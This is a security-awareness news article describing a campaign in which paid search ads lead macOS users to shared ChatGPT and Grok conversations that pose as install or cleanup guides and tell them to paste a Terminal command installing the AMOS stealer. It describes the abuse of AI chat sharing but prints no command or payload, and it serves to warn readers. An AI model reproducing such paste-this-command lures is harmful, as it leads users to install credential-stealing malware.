Attackers Are Distributing Malware Through ChatGPT.

You (hopefully) already know that you shouldn’t take everything AI says at face value. Large language models (LLMs) sometimes provide incorrect information, and attackers are now using paid Google ads to distribute ChatGPT and Grok conversations that appear to be tech support instructions but actually direct macOS users to install malware to steal information on their devices.
This campaign is a variation of the ClickFix attack, which often uses CAPTCHA prompts or fake error messages to trick victims into executing malicious commands. However, in this case, the instructions are disguised as helpful troubleshooting guides for legitimate AI-powered platforms.
How attackers exploit ChatGPT
Kaspersky describes in detail the Atlas installation campaign for macOS. If a user searches for “chatgpt atlas” and finds instructions, the first ad result is a link to chatgpt.com with a page titled “ChatGPT™ Atlas for macOS – Download ChatGPT Atlas for Mac.” Clicking the link takes you to the official ChatGPT website and a series of instructions on (presumably) installing Atlas.
However, this page is a copy of a conversation between an anonymous user and an AI that can be published, and is actually a malware installation guide. The chat prompts you to copy, paste, and execute a command in your Mac’s Terminal, granting all necessary permissions, which will grant access to the AMOS (Atomic macOS Stealer) data thief.
Further investigation by Huntress found similar distortions in results in both ChatGPT and Grok when using more general troubleshooting queries such as “how to delete system data on Mac” and “clean up disk space on macOS.”
AMOS targets macOS, gaining root privileges and allowing attackers to execute commands, record keystrokes, and deliver additional malware. BleepingComputer notes that this malicious code also targets cryptocurrency wallets, browser data (including cookies, saved passwords, and autofill data), macOS keychain data, and files in the file system.
You shouldn’t trust every command generated by artificial intelligence.
When troubleshooting technical issues, carefully check any instructions you find online. Attackers often use sponsored search results and social media to distribute instructions that are actually ClickFix attacks. Never follow instructions you don’t understand, and remember that if you’re asked to run commands on your device using PowerShell or Terminal to “fix” a problem, there’s a high chance it’s malicious information—even if it comes from a search engine or LLM you’ve used and trusted before.
Of course, you can reverse the attack by asking ChatGPT (in a new dialog) whether the instructions are safe to execute. According to Kaspersky, the AI will tell you if they are unsafe.